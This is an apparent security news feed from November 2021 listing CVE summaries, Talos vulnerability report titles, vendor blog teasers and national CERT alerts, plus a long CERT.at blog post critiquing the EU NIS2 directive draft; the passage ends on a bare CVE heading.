CVE-2021-31346
2021-11-17T00:00:00Z | 1637107200

CWE-1284: IMPROPER VALIDATION OF SPECIFIED QUANTITY IN INPUT The total length of an ICMP payload (set in the IP header) is unchecked. This may lead to various side effects, including information leak and denial-of-service conditions, depending on the network buffer organization in memory.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31346
CVE-2021-31345
2021-11-17T00:00:00Z | 1637107200

CWE-1284: IMPROPER VALIDATION OF SPECIFIED QUANTITY IN INPUT The total length of an UDP payload (set in the IP header) is unchecked. This may lead to various side effects, including information leak and denial-of-service conditions, depending on a user-defined application that runs on top of the UDP protocol.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31345
CVE-2021-31344
2021-11-17T00:00:00Z | 1637107200

CWE-843: ACCESS OF RESOURCE USING INCOMPATIBLE TYPE ('TYPE CONFUSION') ICMP echo packets with fake IP options allow sending ICMP echo reply messages to arbitrary hosts on the network.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31344
Digging Deeper ? An In-Depth Analysis of a Fast Flux Network
2021-11-16T14:00:00Z | 1637071200

Fast Flux is a DNS technique used by botnets to hide various types of malicious activities, such as phishing, web proxying, malware delivery, and malware communication, behind an ever-changing network of compromised hosts acting as proxies. The Fast Flux network concept was first introduced in 2006, with the emergence of Storm Worm malware variants. The Fast Flux network is typically used to make the communication between malware and its command and control (C2) server more resistant to discovery. Akamai?s research team has analyzed sophisticated botnet infrastructure that leverages Fast Flux techniques including domains, nameservers, and IP address changes. Figure 1 shows an overview of such a network, which can also be referred to as a form of bulletproof hosting, that hosts various malicious services. These networks empower threat actors to execute attack campaigns by utilizing network capabilities to host malware binaries, proxy communication to C2 servers, phishing websites, or proxy attacks on websites across the internet.

https://www.akamai.com/blog/security/digging-deeper-an-in-depth-analysis-of-a-fast-flux-network
What Makes for a Great IPS: A Security Leader’s Perspective
2021-11-16T12:56:03Z | 1637067363

A recent high severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal vulnerability that can be used to map and leak files was already known to be exploited in the wild. Companies were urged to deploy the patch as quickly as possible.... The post What Makes for a Great IPS: A Security Leader’s Perspective appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-makes-for-a-great-ips-a-security-leaders-perspective/
SASE Game challenges our IT hero through 6 everyday tasks
2021-11-16T12:36:12Z | 1637066172

The post SASE Game challenges our IT hero through 6 everyday tasks appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-sase-game
An update on the state of the NIS2 draft
2021-11-16T11:07:58Z | 1637060878

This is a TLP:WHITE summary of my presentation at the 15th CSIRTs Network meeting in Ljubljana on November 11th. This is not a complete review of the current state of the NIS2 discussions. Overall, I think the council should abandon the idea of finishing the text this year. There is too much in flux and we all lost sense if the text is still consistent. I recommend publishing a new consolidated draft and get a new round of public comments. We reached the limit of high-speed tinkering with the text. This blog post may sound negative. That is selection bias, as I primarily write about the things that need changing, not the other parts with which I agree. Update 2021-11-18: More text on scanning and some links added. References NIS2 Original Proposal Presidency draft of Oct 26. (limite, thus no link. EDIT: The final text was published 2021-12-03) EP Position from ITRE My blog posts On National CSIRTs On the NIS2 Recitals On the normative text Disclaimer These are my personal opinions; this is not the official position of Austria. I talk a lot to our representative in the Horizontal Working Party for Cyber Issue. He is the diplomatic one; I prefer to call things as I see them. "National CSIRT" Historically, the term "national CSIRT" had a clear meaning: The Default CSIRT of a country, the main liaison point for international relations and the primary info-sharing hub inside the country. This can only be a coordinating / advising CSIRT, it usually has no enforcing powers. Its constituency is the whole country (however that is defined in cyberspace). NIS1 botched this That role is never even implied (The CSIRTs cover only the NIS sectors!) An alternative meaning is not defined But the term is used in a few places After long discussions, the CSIRTs Network kind of agreed that all CSIRTs that are accredited according to the NIS transpositions and that cover at least a NIS sector, are "national CSIRTs" The wording caused us many headaches during the ToR/RoP update of 2018. NIS2 does not fix this deficiency in the text. It still contains no definition The word is used in Rec. (13), (25), Art. 9, 13 We managed to fix some of them in the current draft. See below. Two problems: Gaps in the constituency + unclear usage "CSIRTs that cover the NIS sectors" turned out to be a problem as a relevant part of the country is not covered by a CSIRT. Our colleagues in the NCSC-NL had serious problems because they are operating for a strictly defined constituency. Whenever they learn of some danger to other Dutch entities, they are forced to sit on their hands instead of reaching out and helping. "Not in their constituency -> No rights to process data" Austria solved this in the national transposition: §14 NISG: "(6) CSIRTs can perform the tasks pursuant to para 2 subparas 3 to 5 also with regard to other entities or persons if such entities or persons are affected by a risk or incident in their network and information systems." Suggestion Clean up the language: Use "NIS CSIRTs" for the teams that are accredited according to Article 9/10 There is value in actually defining the role of a real national CSIRT. This can be done analogous to Art 6 (1): "Each Member State shall designate one of its CSIRTs as referred to in Article 9 as a coordinator for the purpose of coordinated vulnerability disclosure." Define the tasks for the national CSIRT: act as a coordinating CSIRT for the whole country. Decide for all occurrences of "national CSIRT" in the text what definition should actually apply: "NIS CSIRT" or the "national CSIRT". Be careful about international collaboration. What are the corresponding teams in third countries? (Yes, we need that collaboration.) Definition of CSIRTs (Article 9) On the Commission and Council side, I see no real problem except for the missing national scope (see above). The Parliament went a bit overboard: "Member States shall ensure the possibility of effective, efficient and secure information exchange on all classification levels between their own CSIRTs and CSIRTs from third countries on the same classification level." With the broad scope of NIS2 and sectoral CSIRTs operating with small teams, this is completely unworkable. For coordinating CSIRTs, this is also unneccessary. Requirements and Tasks (Article 10) Art. 10(1)(d) "CSIRTs shall be adequately staffed to ensure availability at all times;" What does this mean? A manned team 24x7 on-site or just one analyst on on-call duty? The former proved to be unworkable (just ask NCSC-NL), the latter makes a lot more sense. Art. 10(2)(a) monitoring cyber threats, vulnerabilities and incidents at national level; and (e) [proactive scanning, language in flux] We need clearer language on scanning for vulnerabilities. As suitable definition would be e.g.: "(e) conducting, upon identified operational needs, a proactive scanning of the network and information systems of CSIRT constituency area, including a member state-wide scan, to detect vulnerabilities with potential significant impact, provided [text on safeguards]. An essential or important entity could request a specific scan of their own resources from a CSIRT serving the entity constituency. " Update 2021-11-18: after a bit more reflection, this is my position on scanning: For any scanning done on request of the entity we don't need any safety clauses like "no intrusions", "no access", "no negative impact", as these scans basically amount to a light form of penetration test that are done frequently by commercial consulting companies. Such a service usually is done after a "permission to attack" document was signed, which clearly lays out the limits and risks of the activity. I don't think we need a specific clause in the directive on this. From my PoV, adding something like "on request by a constituent, a CSIRT can assist with proactive security measures" to the list of Article 10 (2) might be helpful. It doesn't have to be scans, it can be a review of a policy/design, some generic consulting, ...It needs to be a "may" clause, because this is open-ended and can consume boundless resources at the CSIRT. Scanning your constituency for vulnerabilities is a valuable tool for a national CSIRT. We do this every now and then. Important point to note here: There is little point in doing such scans on demand. We do this because organisations might have missed to install an update. If they have e.g. "ProxyShell" in focus, they can just look at their infrastructure, there is no need to ask the CSIRT for a scan. So these scans need a legal basis. But now the increased Scope of NIS2 is biting us: the number of entities is rising by up to two orders of magnitude the CSIRTs don't know who is covered in advance It is thus really hard for a national CSIRT to restrict scanning activities to the "important" and "essential" entities. What we really need here is the license to scan the whole country. (end update) The international cooperation, as defined in the Presidency draft is very welcome. Again, the Parliament went overboard: 1a. CSIRTs shall develop at least the following technical capabilities: (a) the ability to conduct real-time or near-real-time monitoring of networks and information systems, and anomaly detection; (b) the ability to support intrusion prevention and detection; (c) the ability to collect and conduct complex forensic data analysis, and to reverse engineer cyber threats; (d) the ability to filter malign traffic; (e) the ability to enforce strong authentication and access privileges and controls; and (f) the ability to analyse cyber threats Phew. "Ability to filter malign traffic" for a real national CSIRT? That is very thin ice. "Enforce" anything? That might work for a GovCERT, but never ever for a coordinating sectoral one. CSIRTs Network (Article 13) Art. 13(1) In order to contribute to the development of confidence and trust and to promote swift and effective operational cooperation among Member States, a network of the national CSIRTs is established. Drop the "national" here, please. Art. 13(2) The CSIRTs network shall be composed of representatives of the Member States' CSIRTs and CERT-EU. Representatives? This is not the Cooperation Group where "composed of representatives of Member States" makes sense. The CNW is more than just the meeting of the representatives three times per year. So drop "representatives" here. Our teams are the members, not just the liaison officers. We talked about the need for a broad participation of the teams at the meeting in Ljubljana. Which CSIRTs? NIS (see Art. 9), the national one, or any CSIRT? I think a reference to Article 9 is the correct answer and is what we use right now in the CNW ToR. The Presidency changes (ba) [Sharing Publications & Recommendations] and (bb) [Sharing Tools] are good. Scope of NIS2 The scope of the NIS2 was a major part of the discussions in the council. I don't worry about the details regarding important vs. essential entities, I worry about: Scale: the pure number of entities. Probably a factor 20 to 50 over the NIS1 numbers Our tasks, e.g. EP: "(c) responding to incidents and providing assistance to the entities involved;" If you see the CSIRTs as hands-on entities that are involved in on-site incident response in their constituency, then this role will not scale with the proposed numbers of organization. I see little chance that the NIS CSIRTs will cover all the Incident Response capability that all the important/essential entities will need, as this would close to monopolize that job in an EU member state. Thus, the logical conclusion is to reduce the hands-on part of CSIRTs as the size of the constituency increases. The extreme point is the role of the national CSIRT, which is purely a coordination and info-sharing function. Voluntary Reports vs. CVD I still think that the voluntary reporting is more important than the mandatory one. We are way too new to the whole NIS thingy to be able to say how this will really work out. The identification of all OeS just finished here. Give it time to develop. Be careful when transposing: Reports can be about other people's systems, which is a special case of Responsible Disclosure. Example: "Dear CSIRT, I spotted the following bug in the website of company X, please help getting this fixed." We messed up in Austria on our NIS1 transposition, our law says "(2) Entities which have not been identified as operators of essential [...] can submit notifications of risks, incidents and security incidents concerning them to the competent CSIRT [...]". We should have left out the two words "concerning them". So what really is the difference between the coordinated vulnerability disclosure (CVD) and a voluntary report on a weakness in an online service? In first case, the bug is in the software itself, whereas in the latter the mistakes might also have been in the configuration or deployment of the software. As we are moving from the distribution of software via physical media in shrink-wrapped boxed to online distribution (including automatic updates) and Software-as-a-Service (Google Docs, Salesforce, (parts of) Office 365, so is the process of dealing with vulnerabilities changing. The world of software licensing is also making this switch, see e.g. the move from GPL2 to the GNU AGPLv3. I really think we need to re-examine what this evolution of software / services implies for the distinct NIS2 concepts of coordinated vulnerability disclosure, voluntary reporting, network scanning (Article 10(2)(e)) and the job of a truly national CSIRT. Threats The idea here is sound: do not just report actual outages, but also report when something bad is really close to happening. We had such a case recently in Austria: an OeS discovered an APT like intrusion into their systems. It took them about half a year to finish the incident response process to clean their network. The attacker caused no outage at all. Thus, according to our NIS law, the mandatory reporting requirement never triggered. (In this case, a voluntary report was submitted.) Nevertheless, it felt wrong that having someone inside an OeS with the capability to cause mayhem is not enough to trigger a mandatory report. Based on that thinking, it makes sense that the NIS2 draft also wants reports on threats: Art. 20(2) Member States shall ensure that essential and important entities notify, without undue delay, the competent authorities or the CSIRT of any significant cyber threat that those entities identify that could have potentially resulted in a significant incident. If you trace the citations, you arrive at the following definition: "cyber threat" means any potential circumstance, event or action that could damage, disrupt or otherwise adversely impact network and information systems, the users of such systems and other persons; Whoopsie. This is way too generic. Ransomware is a "significant cyber threat" to basically anyone running IT systems. So is the discovery of a 0-day vulnerability in an Internet-facing service. Anyone who isn't aware of a "significant cyber threat" to his/her own organization messed up their risk assessment. It looks to me like the drafters hoped that adding "significant" would be enough, but in my opinion, this does not suffice. "significant" is doing too much heavy lifting here. To be on the safe side, entities need to report their risk assessment (e.g. done as part of their ISO 27001 certification) to the CSIRT. Additionally, this definition triggers on any non-trivial change of the IT setup: those have the nasty property to cause outages every now and then. Yes, we CSIRTs certainly want to see Cc of non-standard changes according to ITIL processes in our constituency. Not really. And then there are the patch cycles: hardly any Microsoft patch Tuesday fails to deliver a critical update. "Significant Cyber Threat" until patched? Oh yes. And Art. 20(2) triggers and the CSIRT should get a report from all Microsoft customers in the constituency. The language needs more precision here. Domain Name System Scope The points on whois access are good. Looking at the provisioning and the resolution side makes a lot of sense (from Presidency draft). But the Scope? Root Nameservers? That is a highly political minefield. Demanding security precautions from them is sensible, but enforcement is not possible for most of them. The most I can envision is a reference to some global standard (optimally set by ICANN) and delegate oversight to the respective national bodies from where the operators' headquarters are. TLDs? European ccTLDs are easy, but what about .com? nGTLDs? ... Are we aiming for a global enforcement like with the GDPR? If yes, this needs a very public discussion. What about other public suffixes? E.g., gv.at, gov.ee, com.es, ... DNS Registration Data (Article 23) 1. For the purpose of contributing to the security, stability and resilience of the DNS, Member States shall ensure that TLD name registries and the entities providing domain name registration services for the TLD shall collect and maintain accurate and complete domain name registration data in a dedicated database facility with due diligence in accordance with Union data protection law as regards data which are personal data. This statement on the purpose is either a bald-faced lie, the result of ignorance about the DNS, or a sleigh of hands in order to insert someone's pet policy objective into the NIS2 directive. Or all three at once. Someone has an agenda. And it is not the security, stability and resilience of the DNS. It may be phishing, spamming, business email compromise (BECs) or other cyber-crime topics. The DNS itself doesn't care about the correctness of domain ownership data just as roads don't care about license plates of cars. The Cooperation Group tasked ENISA to write a report on "DNS Stability" declaring that incorrect registration data is the most pressing issue for the functioning of the DNS. It is not. According to the last draft I have seen, the document only quotes a Centr doc on current practices of some TLDs. I worry that that will morph into a hard requirement. The impact of incorrect whois data is far away from the goals of the NIS directive. The E-Commerce directive would be a much better fit for the topic. We've been hijacked. This reminds me of 1995, when the EU passed telecom surveillance policy via the fishery council. This is utterly ridiculous. The scope, overall effect and the un-intended side effects have not been thought through at all. Scope? Just as with the basic scope of NIS2, it is not clear which registries (and the associated registrars/resellers) are covered by this article. Is this by home country? By target audience? Is this supposed to be like the GDPR and establish a global requirement for global services? In the case of .com, this has another effect. It is a "thin registry", meaning that the registry itself does not contain any information on domain owners. It only stores NS, DS, glue records, the sponsoring registrar and some metadata. What do the requirements of NIS2 mean for such a system? Either change to a thick model, or include the distributed whois databases of all .com registrars. How do you guarantee "accurate"? Even if a registry wants to implement this, how is it going to do that? eID doesn't even really work across the EU. This is a global market. How can one verify a domain owner from other continents? This might somehow work for certain TLDs, which have historically targeted a very specific set of customers, e.g. a few select ccTLDs (.dk, .fi, ...) or sponsored gTLDs (e.g., .aero, .travel). The vast majority of TLDs do not restrict the ownership of domains at all. Can the registries completely push this requirement on registrars? How big is the scope there? According to the ICANN website, we are talking about 2497 ICANN accredited registrars. Not all of them target the EU market. Are they in scope, because .com has a big business in the EU and a thin registry? Existing domain-owners? According to Centr, there are currently 69 Million ccTLD domains in Europe; the global market is around 317 Million domains. How are the registries supposed to verify those? What is the transition/grace period? Has anybody done a cost estimate? Isn't there a legal requirement to do this when you propose a legislation? Ok, there is a "LEGISLATIVE FINANCIAL STATEMENT", let's have a look: ... impact on DG CNECT ... EU Budget ... ENISA. And that's it. Sheesh. If the commission thinks that this verification is only for new domains, then it should bloody well write it into the directive. If it thinks that this could be done during the domain renewal process, then this reveals yet another level of ignorance about the European domain market. Market effects? All this will have a major effect on prices and friction, and thus the competitiveness of the EU domains in a global market. Why Domains? Domains are just one form of online names that are delegated to customers by some sort of registry. We have just as much trouble with Social Media accounts, Cloud service accounts (Cloudflare is very popular by miscreants right now), Webspace, IP-address ownership, email addresses, ... The common denominator with regard to ransomware (the top threat in 2021 according to ENISAs threat landscape report) are crypto currencies. Not invalid domain registrations. The legislators are barking up the wrong tree. Dealing with network abuse is certainly an interesting topic. This needs a fine balance of minimal friction in business versus restrictions to deter and/or stop abuse. This needs the threading of a fine needle. Not a broadsword to one singular network resource. Alternatives? First, we need a real problem statement. You cannot develop policy without first clearly laying out what problem a legislation is trying to mitigate (Case in point: the JCU). Then you can start to think of remedies and start drafting laws. This is how I see it: We need to be able to deal quickly with network abuse That needs clear guidance on who can act under what circumstances against a network resource Right now, the Austrian law enforcement does not have the right tools Whether the owner of that resource has been properly verified must matter when dealing with a misuse of that resource There are examples. E.g. how CH reacts to domain abuse Nevertheless: this is not a topic for the NIS directive. See also the Blog post from the Internet Society. Encryption (Recital 54) For god's sake. Don't start to re-litigate the crypto wars of the 90's. It's over. That horse is dead. The EP got it. "However, this should not lead to any efforts to weaken end-to-end encryption, which is a critical technology for effective data protection and privacy." is the polite way of saying that the preceding sentence on "reconciling encryption with LE needs" is bullshit. I have written at length on this topic some years ago (in German). See also here.

https://www.cert.at/en/blog/2021/11/an-update-on-the-state-of-the-nis2-draft
October focused on raising awareness of cyber security but criminals were also active
2021-11-16T08:21:14Z | 1637050874

October was cyber security awareness month aiming to raise awareness about cyber security and help all of us improve our cyber security skills. Unfortunately, criminals were also hard at work in October, and campaigns phishing for banking details were so active that we decided to issue an alert. We also updated the top 5 threats in our cyber weather report.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_lokakuu_2021
October focused on raising awareness of cyber security but criminals were also active
2021-11-16T08:21:14Z | 1637050874

October was cyber security awareness month aiming to raise awareness about cyber security and help all of us improve our cyber security skills. Unfortunately, criminals were also hard at work in October, and campaigns phishing for banking details were so active that we decided to issue an alert. We also updated the top 5 threats in our cyber weather report.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_lokakuu_2021
Security Alert (A21-11-09): Multiple vulnerabilities in Google Chrome
2021-11-16T04:00:00Z | 1637035200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Google Chrome WebRTC addIceCandidate use after free vulnerability
2021-11-16T00:00:00Z | 1637020800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1348
New Updates to Guardicore Centra Boost Zero Trust Posture and Enhance Ransomware Protection
2021-11-15T16:47:00Z | 1636994820

In our update to Guardicore Hunt see how you can enhance your ransomware protections as well as Zero Trust.

https://www.akamai.com/blog/security/centra-update-zero-trust-posture-and-enhance-ransomware-protection
Open Finance ? 5 Reasons to Consider Akamai
2021-11-15T14:00:00Z | 1636984800

The increased use of smart devices, improved connectivity, and today?s hyper demanding customers are driving the need for digital transformation in the finance sector. Emerging technologies like open banking are creating new opportunities for both incumbent banks and fintechs.

https://www.akamai.com/blog/news/open-finance-5-reasons-to-consider-akamai
We removed the alert on the theft of banking credentials
2021-11-15T13:38:37Z | 1636983517

We have removed the alert issued on 27 October 2021 about fraudsters trying to steal banking details. The number of reports on fraudulent My Kanta Pages and Suomi.fi messages trying to phish for online banking details has significantly reduced. However, fraudsters are still actively trying to steal banking details pretending to represent other organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/we-removed-alert-theft-banking-credentials
We removed the alert on the theft of banking credentials
2021-11-15T13:38:37Z | 1636983517

We have removed the alert issued on 27 October 2021 about fraudsters trying to steal banking details. The number of reports on fraudulent My Kanta Pages and Suomi.fi messages trying to phish for online banking details has significantly reduced. However, fraudsters are still actively trying to steal banking details pretending to represent other organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/we-removed-alert-theft-banking-credentials
Lantronix PremierWave 2050 Web Manager FsUnmount OS command injection vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1326
Lantronix PremierWave 2050 Web Manager FsCopyFile directory traversal vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1324
Lantronix PremierWave 2050 Web Manager File Upload directory traversal vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1323
Lantronix PremierWave 2050 Web Manager FSBrowsePage directory traversal vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1330
Lantronix PremierWave 2050 Web Manager FsTFtp OS command injection vulnerabilities
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1315
Lantronix PremierWave 2050 Web Manager FsUnmount stack-based buffer overflow vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1335
Lantronix PremierWave 2050 Web Manager Diagnostics: Ping OS command injection vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1327
Lantronix PremierWave 2050 Web Manager FsBrowseClean directory traversal vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1338
Lantronix PremierWave 2050 Web Manager SslGenerateCSR stack-based buffer overflow vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1331
Lantronix PremierWave 2050 Web Manager Ping stack-based buffer overflow vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1333
Lantronix PremierWave 2050 Web Manager FsBrowseClean stack-based buffer overflow vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1334
Lantronix PremierWave 2050 Web Manager FsTFtp directory traversal vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1337
Lantronix PremierWave 2050 Web Manager Diagnostics: Traceroute OS command injection vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1312
Lantronix PremierWave 2050 Web Manager FsMove directory traversal vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1329
Lantronix PremierWave 2050 Web Manager SSL Credential Upload OS command injection vulnerabilities
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1314
Lantronix PremierWave 2050 Web Manager Applications and FsBrowse local file inclusion vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1322
Lantronix PremierWave 2050 Web Manager Wireless Network Scanner OS command injection vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
Lantronix PremierWave 2050 Web Manager SslGenerateCertificate OS command injection vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1332
Lantronix PremierWave 2050 Web Manager SslGenerateCSR OS command injection vulnerability
2021-11-15T00:00:00Z | 1636934400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1328
How to choose an interesting project
2021-11-12T05:09:53Z | 1636693793

Trent Brunson, Head of Research & Engineering Originally published on October 15, 2021 Come join our team today! Trail of Bits is hiring full-time Senior Software Engineers and Software Security Research Engineers. Over the last nine years, I’ve interviewed hundreds of applicants for research and engineering positions. One of my favorite icebreakers is, What […]

https://blog.trailofbits.com/2021/11/12/how-to-choose-an-interesting-project/
Security Alert (A21-11-08): Vulnerability in VMWare Products
2021-11-12T04:00:00Z | 1636689600

VMware has published a security advisory to address a vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Motivating global stabilization
2021-11-11T15:39:56Z | 1636645196

Originally published on October 12, 2021 Consensus protocols have come to play a critical role in many applications. Fischer, Lynch, and Paterson’s classic impossibility result showed that under reasonable assumptions, it can be impossible for a protocol to reach consensus. In Dwork, Lynch, and Stockmeyer’s paper “Consensus in the Presence […]

https://blog.trailofbits.com/2021/11/11/motivating-global-stabilization/
Developers Push Coding to the Edge in Akamai
2021-11-11T14:00:00Z | 1636639200

The first-ever Akamai EdgeWorkers Coding Challenge gave participants the opportunity to harness the power and potential of serverless computing using the Akamai Intelligent Edge Platform. Winning developer teams built functions using Akamai EdgeWorkers and EdgeKV products that ranged from DNS acceleration and cost-reducing traffic efficiencies to personalized experiences for news and cloud gaming.

https://www.akamai.com/blog/developers/developers-push-coding-to-the-edge-in-akamai
NCSC publishes security advisory around vulnerabilities in RPKI validation software (update)
2021-11-10T14:16:00Z | 1636553760

The NCSC coordinates a multi-party CVD process around vulnerabilities in RPKI validation software. This process requires broad, multiple coordination with many international parties. The NCSC was approached earlier this year by researchers who found the vulnerabilities with the request to assist them in this multi-party process. Following the request, the NCSC has informed various parties of the existence of these vulnerabilities. The NCSC worked together with the involved parties to find a suitable date on which the updates could be made available.

https://english.ncsc.nl/latest/news/2021/october/29/upcoming-announcement-of-rpki-cvd-procedure
Redefining Security at the Mobile Edge
2021-11-10T14:00:00Z | 1636552800

During the pandemic, organizations became more geographically dispersed, even if that only means people working from home instead of the office. As businesses begin to open up again, the trend is leaning toward mobility as a means to support a hybrid working environment, in which employees have more flexibility to work wherever it suits them best. The remote user, who was once the exception, has become the norm.

https://www.akamai.com/blog/edge/redefining-security-at-the-mobile-edge
Sotsiaalministeerium: TEHIKu juhiks saab Margus Arm
2021-11-10T10:35:55Z | 1636540555

Tervise ja Heaolu Infosüsteemide Keskuse uueks juhiks valiti avaliku konkursi tulemusena senine Riigi Infosüsteemi Ameti (RIA) peadirektori asetäitja Margus Arm, kes alustab uues ametis tööd 1. jaanuarist 2022.

https://ria.ee/uudised/sotsiaalministeerium-tehiku-juhiks-saab-margus-arm
Announcing osquery 5: Now with EndpointSecurity on macOS
2021-11-10T06:05:55Z | 1636524355

Originally published on October 6, 2021 TL;DR: Version 5.0.1 of osquery, a cross-platform, open-source endpoint visibility agent, is now available. This release is an exciting milestone for the project, as it introduces an EndpointSecurity-based process events table for macOS. Read on to learn how we integrated EndpointSecurity into osquery […]

https://blog.trailofbits.com/2021/11/10/announcing-osquery-5-now-with-endpointsecurity-on-macos/
High Threat Security Alert (A21-11-07): Multiple Vulnerabilities in Microsoft Products (November 2021)
2021-11-10T04:00:00Z | 1636516800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
All your tracing are belong to BPF
2021-11-09T16:26:37Z | 1636475197

Originally published August 11, 2021 TL;DR: These simpler, step-by-step methods equip you to apply BPF tracing technology to real-word problems—no specialized tools or libraries required. BPF, a tracing technology in the Linux kernel for network stack tracing, has become popular recently thanks to new extensions that enable novel use-cases […]

https://blog.trailofbits.com/2021/11/09/all-your-tracing-are-belong-to-bpf/
Akamai Is Now a Cybersecurity Powerhouse
2021-11-09T16:00:59Z | 1636473659

Over the past five years, we?ve grown Akamai?s security portfolio from point solutions into a comprehensive platform that provides defense in depth to address our customers? biggest threats. The unique breadth of our defenses is important to our customers who want the most effective security capabilities, and more of them from fewer vendors.

https://www.akamai.com/blog/news/akamai-is-now-a-cybersecurity-powerhouse
Finding Purpose in Wellness
2021-11-09T14:00:00Z | 1636466400

?Wellness? is something that many employers are racing to embrace. Good for both their organizations and their people, wellness is an investment in creating a happier and more engaged workforce, as well as reducing the effects of stress and burnout. It has the potential to increase productivity, foster ideas, and reconnect to a sense of purpose ? for both individuals and the business.

https://www.akamai.com/blog/culture/finding-purpose-in-wellness
How to Terminate Your MPLS Contract Early
2021-11-09T08:15:36Z | 1636445736

In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your MPLS contract might seem daunting due to hefty early termination fees, it’s actually easier and less expensive than you might think. Let’s look at the four steps required for terminating... The post How to Terminate Your MPLS Contract Early appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-terminate-your-mpls-contract-early/
A CISO’s Perspective on Security
2021-11-09T07:24:37Z | 1636442677

The post A CISO’s Perspective on Security appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-94
PrivacyRaven: Implementing a proof of concept for model inversion
2021-11-09T05:45:55Z | 1636436755

Originally published August 3, 2021 During my Trail of Bits winternship and springternship, I had the pleasure of working with Suha Hussain and Jim Miller on PrivacyRaven, a Python-based tool for testing deep-learning frameworks against a plethora of privacy attacks. I worked on improving PrivacyRaven’s versatility by adding compatibility for services […]

https://blog.trailofbits.com/2021/11/09/privacyraven-implementing-a-proof-of-concept-for-model-inversion/
Write Rust lints without forking Clippy
2021-11-09T05:30:40Z | 1636435840

Originally published May 20, 2021 This blog post introduces Dylint, a tool for loading Rust linting rules (or “lints”) from dynamic libraries. Dylint makes it easy for developers to maintain their own personal lint collections. Previously, the simplest way to write a new Rust lint was to fork Clippy, Rust’s […]

https://blog.trailofbits.com/2021/11/09/write-rust-lints-without-forking-clippy/
Discovering goroutine leaks with Semgrep
2021-11-09T04:28:45Z | 1636432125

Originally published May 10, 2021 While learning how to write multithreaded code in Java or C++ can make computer science students reconsider their career choices, calling a function asynchronously in Go is just a matter of prefixing a function call with the go keyword. However, writing concurrent Go code can […]

https://blog.trailofbits.com/2021/11/08/discovering-goroutine-leaks-with-semgrep/
Microsoft Azure Sphere Kernel GPIO_GET_PIN_ACCESS_CONTROL_USER information disclosure vulnerability
2021-11-09T00:00:00Z | 1636416000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1340
Microsoft Azure Sphere Security Monitor SMSyscallCommitImageStaging stage-without-manifest denial of service vulnerability
2021-11-09T00:00:00Z | 1636416000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1341
Microsoft Azure Sphere Pluton concurrent syscalls denial of service vulnerability
2021-11-09T00:00:00Z | 1636416000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1347
Microsoft Azure Sphere Security Monitor SMSyscallStageBaseManifests image validation signature check bypass vulnerability
2021-11-09T00:00:00Z | 1636416000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1342
Microsoft Azure Sphere Kernel GPIO_SET_PIN_CONFIG_IOCTL information disclosure vulnerability
2021-11-09T00:00:00Z | 1636416000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1339
Microsoft Azure Sphere Security Monitor SMSyscallStageBaseManifests offset calculation out-of-bounds read vulnerability
2021-11-09T00:00:00Z | 1636416000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1343
Microsoft Azure Sphere Security Monitor SMSyscallCommitImageStaging 1BL firmware downgrade vulnerability
2021-11-09T00:00:00Z | 1636416000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1344
CVE-2021-42386
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42386
CVE-2021-42385
